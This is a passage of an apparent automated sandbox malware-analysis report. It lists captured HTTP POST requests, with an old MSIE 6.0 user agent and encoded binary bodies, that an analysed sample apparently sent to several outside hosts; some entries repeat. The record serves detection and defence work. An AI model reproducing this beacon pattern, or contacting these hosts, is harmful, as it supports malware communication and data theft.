33 73 57 77 62 62 4d 4d 37 59 39 6e 57 6c 31 72 64 47 59 48 79 6b 65 43 31 49 6f 69 5a 69 49 62 31 57 30 4f 47 75 6e 44 59 78 52 68 32 67 6a 65 4c 6d 65 47 2f 35 72 6e 62 41 33 65 31 6e 67 34 6a 79 49 33 79 73 49 70 70 63 63 4f 53 62 54 59 47 34 45 68 73 4f 38 4f 64 61 5a 2f 49 58 53 70 58 57 33 31 42 4d 6d 75 4e 6f 41 6b 2f 6c 7a 35 2b 58 76 53 5a 67 6b 74 4b 48 47 6b 49 36 6a 66 58 35 50 4f 31 35 63 47 7a 49 62 48 6f 7a 47 48 2b 34 58 64 4e 39 6d 66 4b 37 49 44 6d 4a 68 2b 30 63 35 59 4b 38 6b 58 55 42 50 54 4f 34 73 51 44 37 6c 55 34 30 7a 61 56 64 70 79 70 51 68 75 4f 4c 4a 51 52 42 50 7a 54 77 33 79 37 6b 7a 48 4b 37 64 4a 31 37 6b 4d 50 6a 30 6f 31 73 53 Data Ascii: hHNyxH1C7AheUWc3NCEhUbb7hNmr442mAWPeumlLYQzvIGEtrtOTP5mSwf83/M5Xsnl17gnvHKzlTgSxjm8IpKKlrHeyrTXql6RDYwatu7r6tUnuETO7SNV2/zeLQ5dkctyptOb9WHpDzrxonNys3y0NNOGS5q/9I9WMb9nEj0cqlGMTpAKoncZ7pBSt7QNjV0q9CTichNMtpKA19qVb6ChdO44afwe5A2191qdmWZla5bdZ9kppjF2ujrY7+NDKicAlJ7tErQQ2/nzkl+2Y0rbUZcb8ChJUHah9L2jDhvGLf0YRuYVOos2saSdDazDhWdfsya2IR2N+93o9OJSWqhFplFHCG3sWwbbMM7Y9nWl1rdGYHykeC1IoiZiIb1W0OGunDYxRh2gjeLmeG/5rnbA3e1ng4jyI3ysIppccOSbTYG4EhsO8OdaZ/IXSpXW31BMmuNoAk/lz5+XvSZgktKHGkI6jfX5PO15cGzIbHozGH+4XdN9mfK7IDmJh+0c5YK8kXUBPTO4sQD7lU40zaVdpypQhuOLJQRBPzTw3y7kzHK7dJ17kMPj0o1sS
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 56 77 58 57 75 70 62 79 36 77 69 4e 47 53 6a 62 63 51 69 34 59 7a 6b 30 45 59 45 32 62 47 48 78 4b 72 42 70 6a 38 6b 41 50 45 35 51 62 49 57 69 62 6d 64 79 54 42 4c 5a 58 6e 2b 65 32 55 34 46 58 2b 4c 47 34 70 6a 59 30 56 69 73 50 5a 75 6a 37 73 2b 54 69 75 36 63 78 55 63 6e 6d 6f 6f 64 35 4d 6c 50 5a 67 63 4e 73 67 50 69 62 51 6a 2f 77 48 6a 72 74 6b 4c 56 6f 53 72 62 2f 72 64 37 55 67 4d 41 31 52 34 35 68 77 76 55 70 65 2b 4b 43 7a 33 30 46 6c 79 57 4c 58 76 6b 32 6a 55 75 70 2f 49 55 4f 73 63 71 78 4b 47 47 47 71 33 2f 76 78 59 6e 6a 4c 4e 54 69 52 61 35 6b 4a 78 67 6c 45 54 4f 36 6f 33 44 4c 33 2f 59 78 48 4c 73 35 43 41 4e 34 53 50 73 78 58 74 61 34 2b 51 75 4c 47 70 4f 34 65 39 39 7a 62 35 7a 49 30 6f 65 52 56 73 6f 56 6e 30 43 6d 4b 66 58 6c 62 37 73 45 65 73 54 6f 76 79 47 42 59 47 6f 53 36 78 64 2f 6e 5a 74 37 74 70 51 34 4c 30 6c 68 46 32 4c 78 47 78 77 53 30 61 50 6f 61 68 56 39 51 66 32 43 31 57 73 4c 6b 50 6f 39 76 41 6e 71 6d 63 41 78 62 56 41 43 44 6b 76 39 7a 66 77 49 67 55 41 39 78 57 46 57 32 79 36 57 32 66 70 30 30 75 34 71 2f 45 71 68 32 5a 45 4b 71 61 6d 4d 6b 56 46 4e 51 39 5a 6c 68 77 47 66 72 62 45 49 4e 36 47 47 6c 46 63 64 4c 69 5a 74 52 2f 4d 71 64 47 57 4a 2f 52 30 46 33 48 4b 4b 53 37 35 4a 48 6e 78 32 71 33 6f 67 31 39 55 66 42 33 35 72 4d 2f 53 2f 38 36 42 47 46 6c 74 6d 53 75 32 6a 36 67 4f 4f 6d 32 79 4f 75 4f 31 6a 43 55 72 36 2b 54 77 43 74 53 4c 35 6b 56 67 51 43 54 53 66 72 6f 79 77 32 67 4c 56 4a 42 63 57 4e 6c 4e 32 64 37 66 30 38 7a 67 4a 39 63 42 6a 6b 54 4c 4a 62 38 77 36 4c 32 59 2b 76 53 44 4d 49 58 70 54 52 70 4d 39 73 4d 4d 74 76 49 4d 72 75 47 4c 7a 33 35 5a 78 76 2b 75 63 4a 74 5a 62 68 41 6e 76 62 47 36 Data Ascii: VwXWupby6wiNGSjbcQi4Yzk0EYE2bGHxKrBpj8kAPE5QbIWibmdyTBLZXn+e2U4FX+LG4pjY0VisPZuj7s+Tiu6cxUcnmood5MlPZgcNsgPibQj/wHjrtkLVoSrb/rd7UgMA1R45hwvUpe+KCz30FlyWLXvk2jUup/IUOscqxKGGGq3/vxYnjLNTiRa5kJxglETO6o3DL3/YxHLs5CAN4SPsxXta4+QuLGpO4e99zb5zI0oeRVsoVn0CmKfXlb7sEesTovyGBYGoS6xd/nZt7tpQ4L0lhF2LxGxwS0aPoahV9Qf2C1WsLkPo9vAnqmcAxbVACDkv9zfwIgUA9xWFW2y6W2fp00u4q/Eqh2ZEKqamMkVFNQ9ZlhwGfrbEIN6GGlFcdLiZtR/MqdGWJ/R0F3HKKS75JHnx2q3og19UfB35rM/S/86BGFltmSu2j6gOOm2yOuO1jCUr6+TwCtSL5kVgQCTSfroyw2gLVJBcWNlN2d7f08zgJ9cBjkTLJb8w6L2Y+vSDMIXpTRpM9sMMtvIMruGLz35Zxv+ucJtZbhAnvbG6
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 75 7a 62 54 78 6b 4a 57 37 41 67 7a 51 65 75 51 4e 61 41 2f 52 38 58 51 78 4f 5a 53 31 34 76 31 6c 68 6a 64 45 58 75 53 65 33 38 5a 70 6c 6c 6c 79 67 33 4e 70 65 48 74 33 55 61 79 6e 50 77 39 6c 47 58 78 78 46 4b 61 61 4f 5a 61 49 6e 58 49 6a 59 48 6c 79 4c 52 62 72 6d 55 4c 2f 70 5a 77 58 35 58 32 54 6a 68 72 70 36 67 4a 2b 2b 69 2b 64 4e 30 61 4a 66 37 4b 57 69 4d 45 46 6e 69 79 38 44 68 32 47 46 39 54 71 36 37 44 2f 59 37 4e 77 75 31 67 79 36 56 6c 70 6b 42 32 2b 57 66 4a 76 37 6d 6e 79 35 4e 4c 45 56 52 59 6d 71 38 31 37 45 45 78 34 77 33 62 52 6c 53 2b 39 79 37 58 33 73 41 56 63 4a 4a 78 34 49 78 65 72 4d 59 6d 2b 64 44 39 61 46 64 34 74 57 79 70 33 46 43 54 78 62 4d 6a 4b 4a 5a 4e 74 44 53 55 2f 7a 43 71 4e 4c 43 74 51 76 6e 6a 35 76 50 4a 39 45 55 2f 51 6e 4b 7a 72 4e 6b 33 31 48 2b 34 6b 72 2b 66 52 49 6d 4f 55 64 51 35 62 78 63 55 30 38 44 7a 64 79 43 44 76 35 6e 46 7a 30 32 42 52 55 56 50 38 53 68 41 41 39 43 6e 68 69 74 5a 35 78 4b 57 47 74 4a 30 39 74 2b 57 6b 7a 43 47 41 39 58 75 36 42 68 2f 6b 49 4b 77 6b 73 42 33 6a 67 4e 37 6e 54 6a 70 41 34 6a 72 33 4c 79 6c 57 37 7a 30 4b 52 30 48 4f 48 6e 39 7a 49 4c 45 67 6d 6a 38 4f 63 6a 42 6b 5a 6c 64 56 2f 6a 58 38 4d 6d 6d 49 35 61 45 6c 62 4d 6d 66 44 75 6f 68 65 45 75 7a 32 39 66 4a 42 7a 33 45 76 6a 57 55 37 32 65 4c 6d 37 53 64 42 49 4f 31 42 51 44 42 6d 6b 55 54 62 2f 43 55 78 4d 65 73 42 59 59 6d 4b 61 4a 71 59 43 61 54 76 33 38 62 4d 38 73 57 61 4d 7a 34 6b 47 65 4f 37 64 77 31 6f 61 30 59 58 57 76 4e 4d 34 46 53 51 34 75 30 52 55 79 37 50 53 4c 2b 5a 58 4e 42 56 74 59 30 43 77 37 48 4c 57 6f 46 4f 50 6e 4b 58 54 39 31 36 37 6a 58 6e 4f 39 35 78 64 4a 39 77 3d 3d Data Ascii: uzbTxkJW7AgzQeuQNaA/R8XQxOZS14v1lhjdEXuSe38Zplllyg3NpeHt3UaynPw9lGXxxFKaaOZaInXIjYHlyLRbrmUL/pZwX5X2Tjhrp6gJ++i+dN0aJf7KWiMEFniy8Dh2GF9Tq67D/Y7Nwu1gy6VlpkB2+WfJv7mny5NLEVRYmq817EEx4w3bRlS+9y7X3sAVcJJx4IxerMYm+dD9aFd4tWyp3FCTxbMjKJZNtDSU/zCqNLCtQvnj5vPJ9EU/QnKzrNk31H+4kr+fRImOUdQ5bxcU08DzdyCDv5nFz02BRUVP8ShAA9CnhitZ5xKWGtJ09t+WkzCGA9Xu6Bh/kIKwksB3jgN7nTjpA4jr3LylW7z0KR0HOHn9zILEgmj8OcjBkZldV/jX8MmmI5aElbMmfDuoheEuz29fJBz3EvjWU72eLm7SdBIO1BQDBmkUTb/CUxMesBYYmKaJqYCaTv38bM8sWaMz4kGeO7dw1oa0YXWvNM4FSQ4u0RUy7PSL+ZXNBVtY0Cw7HLWoFOPnKXT9167jXnO95xdJ9w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 58 62 38 49 41 53 59 36 37 67 68 6d 6a 56 43 38 77 51 74 70 53 55 6b 32 79 75 73 47 49 35 44 68 75 69 68 57 67 71 37 30 2f 4c 76 62 69 4b 48 6a 61 69 65 7a 70 39 69 61 75 37 75 77 63 42 34 64 69 61 57 2f 58 50 4c 74 46 6f 6e 38 6e 77 78 66 75 7a 4b 65 2f 33 2b 4e 4c 6a 4c 6c 76 76 55 74 63 46 42 45 48 33 49 47 63 37 32 33 61 58 5a 43 63 2b 4c 72 4a 57 42 71 42 63 4d 73 41 31 46 55 6b 36 52 31 37 57 56 38 32 50 45 62 36 75 57 51 30 63 32 73 78 33 64 70 48 34 51 38 50 6a 79 4f 6e 7a 46 78 5a 74 56 71 66 4b 53 73 2b 41 41 5a 44 49 57 78 4b 39 44 4b 6c 4c 4a 42 42 37 49 62 76 34 71 69 34 62 62 36 30 70 2b 33 6c 62 38 6c 4d 49 2b 6f 54 35 74 6a 62 47 34 61 69 63 52 61 74 75 43 59 59 67 67 6a 57 32 52 4c 6f 4b 45 76 4e 4b 37 68 52 54 2b 62 45 58 6d 6e 39 32 49 33 39 35 79 39 4d 75 7a 62 6f 43 6c 2f 78 47 78 32 42 50 51 65 73 34 58 6e 54 4c 37 56 57 45 7a 41 70 70 70 7a 45 75 38 6f 72 76 7a 70 35 70 6e 72 38 58 77 41 61 51 30 54 46 63 2f 75 43 52 53 6d 30 63 52 77 79 4b 79 43 45 43 6b 4d 75 69 63 59 6a 4e 79 49 38 33 37 36 71 74 6e 39 6f 46 74 61 42 2b 50 43 63 46 45 74 43 62 50 58 67 72 30 54 49 52 6e 4a 37 33 72 58 69 6a 45 6f 39 6e 47 4d 74 58 79 30 4d 77 69 4f 44 69 49 6c 68 56 55 56 41 57 41 48 64 2b 6e 48 4b 56 47 5a 6f 77 34 31 4e 7a 73 48 44 70 78 58 47 72 7a 46 59 53 42 2f 4f 77 49 71 75 66 57 45 61 73 42 35 44 50 59 36 6c 7a 54 6f 63 78 6c 50 70 31 74 42 33 64 5a 37 6e 43 33 62 47 4f 64 38 66 65 52 6b 4c 4e 52 31 4e 47 41 59 61 70 6d 2b 56 6c 65 32 59 71 64 6a 61 6c 4b 4c 48 4e 4c 37 39 34 70 47 32 33 48 42 78 6c 52 53 6b 75 6c 2b 33 56 71 33 4b 37 42 31 6a 73 78 62 30 6a 73 3d Data Ascii: Xb8IASY67ghmjVC8wQtpSUk2yusGI5DhuihWgq70/LvbiKHjaiezp9iau7uwcB4diaW/XPLtFon8nwxfuzKe/3+NLjLlvvUtcFBEH3IGc723aXZCc+LrJWBqBcMsA1FUk6R17WV82PEb6uWQ0c2sx3dpH4Q8PjyOnzFxZtVqfKSs+AAZDIWxK9DKlLJBB7Ibv4qi4bb60p+3lb8lMI+oT5tjbG4aicRatuCYYggjW2RLoKEvNK7hRT+bEXmn92I395y9MuzboCl/xGx2BPQes4XnTL7VWEzApppzEu8orvzp5pnr8XwAaQ0TFc/uCRSm0cRwyKyCECkMuicYjNyI8376qtn9oFtaB+PCcFEtCbPXgr0TIRnJ73rXijEo9nGMtXy0MwiODiIlhVUVAWAHd+nHKVGZow41NzsHDpxXGrzFYSB/OwIqufWEasB5DPY6lzTocxlPp1tB3dZ7nC3bGOd8feRkLNR1NGAYapm+Vle2YqdjalKLHNL794pG23HBxlRSkul+3Vq3K7B1jsxb0js=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 56 77 58 57 75 70 62 79 36 77 69 4e 47 53 6a 62 63 51 69 34 59 7a 6b 30 45 59 45 32 62 47 48 78 4b 72 42 70 6a 38 6b 41 50 45 35 51 62 49 57 69 62 6d 64 79 54 42 4c 5a 58 6e 2b 65 32 55 34 46 58 2b 4c 47 34 70 6a 59 30 56 69 73 50 5a 75 6a 37 73 2b 54 69 75 36 63 78 55 63 6e 6d 6f 6f 64 35 4d 6c 50 5a 67 63 4e 73 67 50 69 62 51 6a 2f 77 48 6a 72 74 6b 4c 56 6f 53 72 62 2f 72 64 37 55 67 4d 41 31 52 34 35 68 77 76 55 70 65 2b 4b 43 7a 33 30 46 6c 79 57 4c 58 76 6b 32 6a 55 75 70 2f 49 55 4f 73 63 71 78 4b 47 47 47 71 33 2f 76 78 59 6e 6a 4c 4e 54 69 52 61 35 6b 4a 78 67 6c 45 54 4f 36 6f 33 44 4c 33 2f 59 78 48 4c 73 35 43 41 4e 34 53 50 73 78 58 74 61 34 2b 51 75 4c 47 70 4f 34 65 39 39 7a 62 35 7a 49 30 6f 65 52 56 73 6f 56 6e 30 43 6d 4b 66 58 6c 62 37 73 45 65 73 54 6f 76 79 47 42 59 47 6f 53 36 78 64 2f 6e 5a 74 37 74 70 51 34 4c 30 6c 68 46 32 4c 78 47 78 77 53 30 61 50 6f 61 68 56 39 51 66 32 43 31 57 73 4c 6b 50 6f 39 76 41 6e 71 6d 63 41 78 62 56 41 43 44 6b 76 39 7a 66 77 49 67 55 41 39 78 57 46 57 32 79 36 57 32 66 70 30 30 75 34 71 2f 45 71 68 32 5a 45 4b 71 61 6d 4d 6b 56 46 4e 51 39 5a 6c 68 77 47 66 72 62 45 49 4e 36 47 47 6c 46 63 64 4c 69 5a 74 52 2f 4d 71 64 47 57 4a 2f 52 30 46 33 48 4b 4b 53 37 35 4a 48 6e 78 32 71 33 6f 67 31 39 55 66 42 33 35 72 4d 2f 53 2f 38 36 42 47 46 6c 74 6d 53 75 32 6a 36 67 4f 4f 6d 32 79 4f 75 4f 31 6a 43 55 72 36 2b 54 77 43 74 53 4c 35 6b 56 67 51 43 54 53 66 72 6f 79 77 32 67 4c 56 4a 42 63 57 4e 6c 4e 32 64 37 66 30 38 7a 67 4a 39 63 42 6a 6b 54 4c 4a 62 38 77 36 4c 32 59 2b 76 53 44 4d 49 58 70 54 52 70 4d 39 73 4d 4d 74 76 49 4d 72 75 47 4c 7a 33 35 5a 78 76 2b 75 63 4a 74 5a 62 68 41 6e 76 62 47 36 Data Ascii: VwXWupby6wiNGSjbcQi4Yzk0EYE2bGHxKrBpj8kAPE5QbIWibmdyTBLZXn+e2U4FX+LG4pjY0VisPZuj7s+Tiu6cxUcnmood5MlPZgcNsgPibQj/wHjrtkLVoSrb/rd7UgMA1R45hwvUpe+KCz30FlyWLXvk2jUup/IUOscqxKGGGq3/vxYnjLNTiRa5kJxglETO6o3DL3/YxHLs5CAN4SPsxXta4+QuLGpO4e99zb5zI0oeRVsoVn0CmKfXlb7sEesTovyGBYGoS6xd/nZt7tpQ4L0lhF2LxGxwS0aPoahV9Qf2C1WsLkPo9vAnqmcAxbVACDkv9zfwIgUA9xWFW2y6W2fp00u4q/Eqh2ZEKqamMkVFNQ9ZlhwGfrbEIN6GGlFcdLiZtR/MqdGWJ/R0F3HKKS75JHnx2q3og19UfB35rM/S/86BGFltmSu2j6gOOm2yOuO1jCUr6+TwCtSL5kVgQCTSfroyw2gLVJBcWNlN2d7f08zgJ9cBjkTLJb8w6L2Y+vSDMIXpTRpM9sMMtvIMruGLz35Zxv+ucJtZbhAnvbG6
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 58 62 38 49 41 53 59 36 37 67 68 6d 6a 56 43 38 77 51 74 70 53 55 6b 32 79 75 73 47 49 35 44 68 75 69 68 57 67 71 37 30 2f 4c 76 62 69 4b 48 6a 61 69 65 7a 70 39 69 61 75 37 75 77 63 42 34 64 69 61 57 2f 58 50 4c 74 46 6f 6e 38 6e 77 78 66 75 7a 4b 65 2f 33 2b 4e 4c 6a 4c 6c 76 76 55 74 63 46 42 45 48 33 49 47 63 37 32 33 61 58 5a 43 63 2b 4c 72 4a 57 42 71 42 63 4d 73 41 31 46 55 6b 36 52 31 37 57 56 38 32 50 45 62 36 75 57 51 30 63 32 73 78 33 64 70 48 34 51 38 50 6a 79 4f 6e 7a 46 78 5a 74 56 71 66 4b 53 73 2b 41 41 5a 44 49 57 78 4b 39 44 4b 6c 4c 4a 42 42 37 49 62 76 34 71 69 34 62 62 36 30 70 2b 33 6c 62 38 6c 4d 49 2b 6f 54 35 74 6a 62 47 34 61 69 63 52 61 74 75 43 59 59 67 67 6a 57 32 52 4c 6f 4b 45 76 4e 4b 37 68 52 54 2b 62 45 58 6d 6e 39 32 49 33 39 35 79 39 4d 75 7a 62 6f 43 6c 2f 78 47 78 32 42 50 51 65 73 34 58 6e 54 4c 37 56 57 45 7a 41 70 70 70 7a 45 75 38 6f 72 76 7a 70 35 70 6e 72 38 58 77 41 61 51 30 54 46 63 2f 75 43 52 53 6d 30 63 52 77 79 4b 79 43 45 43 6b 4d 75 69 63 59 6a 4e 79 49 38 33 37 36 71 74 6e 39 6f 46 74 61 42 2b 50 43 63 46 45 74 43 62 50 58 67 72 30 54 49 52 6e 4a 37 33 72 58 69 6a 45 6f 39 6e 47 4d 74 58 79 30 4d 77 69 4f 44 69 49 6c 68 56 55 56 41 57 41 48 64 2b 6e 48 4b 56 47 5a 6f 77 34 31 4e 7a 73 48 44 70 78 58 47 72 7a 46 59 53 42 2f 4f 77 49 71 75 66 57 45 61 73 42 35 44 50 59 36 6c 7a 54 6f 63 78 6c 50 70 31 74 42 33 64 5a 37 6e 43 33 62 47 4f 64 38 66 65 52 6b 4c 4e 52 31 4e 47 41 59 61 70 6d 2b 56 6c 65 32 59 71 64 6a 61 6c 4b 4c 48 4e 4c 37 39 34 70 47 32 33 48 42 78 6c 52 53 6b 75 6c 2b 33 56 71 33 4b 37 42 31 6a 73 78 62 30 6a 73 3d Data Ascii: Xb8IASY67ghmjVC8wQtpSUk2yusGI5DhuihWgq70/LvbiKHjaiezp9iau7uwcB4diaW/XPLtFon8nwxfuzKe/3+NLjLlvvUtcFBEH3IGc723aXZCc+LrJWBqBcMsA1FUk6R17WV82PEb6uWQ0c2sx3dpH4Q8PjyOnzFxZtVqfKSs+AAZDIWxK9DKlLJBB7Ibv4qi4bb60p+3lb8lMI+oT5tjbG4aicRatuCYYggjW2RLoKEvNK7hRT+bEXmn92I395y9MuzboCl/xGx2BPQes4XnTL7VWEzApppzEu8orvzp5pnr8XwAaQ0TFc/uCRSm0cRwyKyCECkMuicYjNyI8376qtn9oFtaB+PCcFEtCbPXgr0TIRnJ73rXijEo9nGMtXy0MwiODiIlhVUVAWAHd+nHKVGZow41NzsHDpxXGrzFYSB/OwIqufWEasB5DPY6lzTocxlPp1tB3dZ7nC3bGOd8feRkLNR1NGAYapm+Vle2YqdjalKLHNL794pG23HBxlRSkul+3Vq3K7B1jsxb0js=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 68 48 4e 79 78 48 31 43 37 41 68 65 55 57 63 33 4e 43 45 68 55 62 62 37 68 4e 6d 72 34 34 32 6d 41 57 50 65 75 6d 6c 4c 59 51 7a 76 49 47 45 74 72 74 4f 54 50 35 6d 53 77 66 38 33 2f 4d 35 58 73 6e 6c 31 37 67 6e 76 48 4b 7a 6c 54 67 53 78 6a 6d 38 49 70 4b 4b 6c 72 48 65 79 72 54 58 71 6c 36 52 44 59 77 61 74 75 37 72 36 74 55 6e 75 45 54 4f 37 53 4e 56 32 2f 7a 65 4c 51 35 64 6b 63 74 79 70 74 4f 62 39 57 48 70 44 7a 72 78 6f 6e 4e 79 73 33 79 30 4e 4e 4f 47 53 35 71 2f 39 49 39 57 4d 62 39 6e 45 6a 30 63 71 6c 47 4d 54 70 41 4b 6f 6e 63 5a 37 70 42 53 74 37 51 4e 6a 56 30 71 39 43 54 69 63 68 4e 4d 74 70 4b 41 31 39 71 56 62 36 43 68 64 4f 34 34 61 66 77 65 35 41 32 31 39 31 71 64 6d 57 5a 6c 61 35 62 64 5a 39 6b 70 70 6a 46 32 75 6a 72 59 37 2b 4e 44 4b 69 63 41 6c 4a 37 74 45 72 51 51 32 2f 6e 7a 6b 6c 2b 32 59 30 72 62 55 5a 63 62 38 43 68 4a 55 48 61 68 39 4c 32 6a 44 68 76 47 4c 66 30 59 52 75 59 56 4f 6f 73 32 73 61 53 64 44 61 7a 44 68 57 64 66 73 79 61 32 49 52 32 4e 2b 39 33 6f 39 4f 4a 53 57 71 68 46 70 6c 46 48 43 47 33 73 57 77 62 62 4d 4d 37 59 39 6e 57 6c 31 72 64 47 59 48 79 6b 65 43 31 49 6f 69 5a 69 49 62 31 57 30 4f 47 75 6e 44 59 78 52 68 32 67 6a 65 4c 6d 65 47 2f 35 72 6e 62 41 33 65 31 6e 67 34 6a 79 49 33 79 73 49 70 70 63 63 4f 53 62 54 59 47 34 45 68 73 4f 38 4f 64 61 5a 2f 49 58 53 70 58 57 33 31 42 4d 6d 75 4e 6f 41 6b 2f 6c 7a 35 2b 58 76 53 5a 67 6b 74 4b 48 47 6b 49 36 6a 66 58 35 50 4f 31 35 63 47 7a 49 62 48 6f 7a 47 48 2b 34 58 64 4e 39 6d 66 4b 37 49 44 6d 4a 68 2b 30 63 35 59 4b 38 6b 58 55 42 50 54 4f 34 73 51 44 37 6c 55 34 30 7a 61 56 64 70 79 70 51 68 75 4f 4c 4a 51 52 42 50 7a 54 77 33 79 37 6b 7a 48 4b 37 64 4a 31 37 6b 4d 50 6a 30 6f 31 73 53 Data Ascii: hHNyxH1C7AheUWc3NCEhUbb7hNmr442mAWPeumlLYQzvIGEtrtOTP5mSwf83/M5Xsnl17gnvHKzlTgSxjm8IpKKlrHeyrTXql6RDYwatu7r6tUnuETO7SNV2/zeLQ5dkctyptOb9WHpDzrxonNys3y0NNOGS5q/9I9WMb9nEj0cqlGMTpAKoncZ7pBSt7QNjV0q9CTichNMtpKA19qVb6ChdO44afwe5A2191qdmWZla5bdZ9kppjF2ujrY7+NDKicAlJ7tErQQ2/nzkl+2Y0rbUZcb8ChJUHah9L2jDhvGLf0YRuYVOos2saSdDazDhWdfsya2IR2N+93o9OJSWqhFplFHCG3sWwbbMM7Y9nWl1rdGYHykeC1IoiZiIb1W0OGunDYxRh2gjeLmeG/5rnbA3e1ng4jyI3ysIppccOSbTYG4EhsO8OdaZ/IXSpXW31BMmuNoAk/lz5+XvSZgktKHGkI6jfX5PO15cGzIbHozGH+4XdN9mfK7IDmJh+0c5YK8kXUBPTO4sQD7lU40zaVdpypQhuOLJQRBPzTw3y7kzHK7dJ17kMPj0o1sS
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 75 58 41 77 4a 54 51 48 41 41 6d 42 66 38 36 67 6a 77 6c 69 61 49 65 59 53 33 6f 73 57 4f 32 6f 71 50 63 52 42 75 32 72 67 6a 59 48 43 6a 48 70 30 33 77 64 52 56 54 6c 2f 36 77 4b 32 59 6f 68 50 6a 4c 67 4e 64 66 30 75 56 70 6c 6a 4f 36 50 31 4e 63 49 51 39 61 4a 4f 62 37 37 68 5a 55 76 73 37 34 38 33 57 50 66 54 79 45 51 48 52 45 69 69 5a 61 4c 54 30 4c 47 2f 4b 66 62 41 33 66 4d 6f 41 76 63 68 55 63 6e 59 47 6a 38 57 63 6c 62 2b 38 49 79 78 62 74 46 4c 75 68 78 34 63 77 61 58 43 51 70 4e 6b 78 38 76 33 54 74 57 2f 6d 69 73 57 56 2f 33 4d 4f 42 4d 48 4d 69 51 5a 42 4c 63 54 78 37 4e 62 4c 43 36 37 4d 65 34 4c 44 59 36 76 47 39 59 4e 6f 65 76 6b 74 31 70 38 4e 68 51 36 73 45 32 36 73 54 52 41 50 69 4d 76 6c 4c 48 50 30 66 59 4b 32 6b 71 34 67 41 4b 78 50 35 57 67 2f 48 63 4c 76 33 63 66 77 71 6d 6e 74 38 75 46 76 73 70 70 5a 72 4c 6d 64 4d 4a 55 6a 32 69 72 73 2b 7a 70 4e 2f 71 2f 53 51 67 7a 75 42 66 36 47 64 65 4a 55 43 75 5a 68 41 57 59 50 66 35 37 47 67 59 6e 46 6e 63 6c 76 65 46 6a 35 53 37 4d 67 63 38 55 42 52 61 6d 36 74 66 65 4b 44 5a 70 6d 6d 31 46 4a 52 4f 6b 68 61 31 50 78 48 66 45 39 4a 2f 5a 59 46 31 50 34 6a 4e 56 67 41 56 69 6d 4e 35 30 59 30 57 54 34 44 66 51 4b 70 61 4a 56 58 34 41 2b 6b 4d 6d 2b 75 59 6c 66 4c 73 33 57 73 4e 4a 33 68 7a 46 65 35 67 57 72 48 58 6a 56 77 4d 53 35 4e 37 30 6d 35 45 55 45 46 72 44 50 64 62 2f 66 77 59 7a 2f 6f 66 77 52 38 30 6b 48 66 46 6d 43 46 76 31 79 47 47 42 6a 68 78 72 6d 43 7a 34 6c 42 6e 54 6f 44 6c 57 4d 51 68 35 63 31 35 2b 68 39 52 4f 79 72 6c 44 52 4a 39 5a 63 51 64 53 2b 6d 34 59 34 69 5a 66 65 34 54 34 77 4f 6b 72 7a 54 49 57 66 6e Data Ascii: uXAwJTQHAAmBf86gjwliaIeYS3osWO2oqPcRBu2rgjYHCjHp03wdRVTl/6wK2YohPjLgNdf0uVpljO6P1NcIQ9aJOb77hZUvs7483WPfTyEQHREiiZaLT0LG/KfbA3fMoAvchUcnYGj8Wclb+8IyxbtFLuhx4cwaXCQpNkx8v3TtW/misWV/3MOBMHMiQZBLcTx7NbLC67Me4LDY6vG9YNoevkt1p8NhQ6sE26sTRAPiMvlLHP0fYK2kq4gAKxP5Wg/HcLv3cfwqmnt8uFvsppZrLmdMJUj2irs+zpN/q/SQgzuBf6GdeJUCuZhAWYPf57GgYnFnclveFj5S7Mgc8UBRam6tfeKDZpmm1FJROkha1PxHfE9J/ZYF1P4jNVgAVimN50Y0WT4DfQKpaJVX4A+kMm+uYlfLs3WsNJ3hzFe5gWrHXjVwMS5N70m5EUEFrDPdb/fwYz/ofwR80kHfFmCFv1yGGBjhxrmCz4lBnToDlWMQh5c15+h9ROyrlDRJ9ZcQdS+m4Y4iZfe4T4wOkrzTIWfn
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 33 46 74 2b 31 6f 58 59 37 41 68 31 44 75 35 39 72 50 43 33 4d 2f 37 6d 6b 70 6c 54 52 67 6e 74 69 56 31 63 64 4c 59 73 36 4d 6c 34 48 35 61 4d 4d 55 44 52 71 34 33 65 31 61 70 48 46 47 66 67 2b 43 57 70 44 4c 43 5a 71 49 45 34 36 75 61 50 34 52 56 67 38 54 34 6d 2b 41 45 6b 6d 6d 46 30 44 4a 77 7a 6a 6e 49 34 44 76 33 2f 63 35 64 6d 67 62 58 55 31 6a 46 44 70 6a 43 5a 4f 66 58 6b 34 54 76 37 6d 68 46 6b 4d 57 74 65 64 7a 55 5a 31 4b 2b 45 69 30 66 32 55 68 36 58 6a 6a 6b 49 6f 6b 69 50 6d 79 62 55 37 6a 68 62 44 79 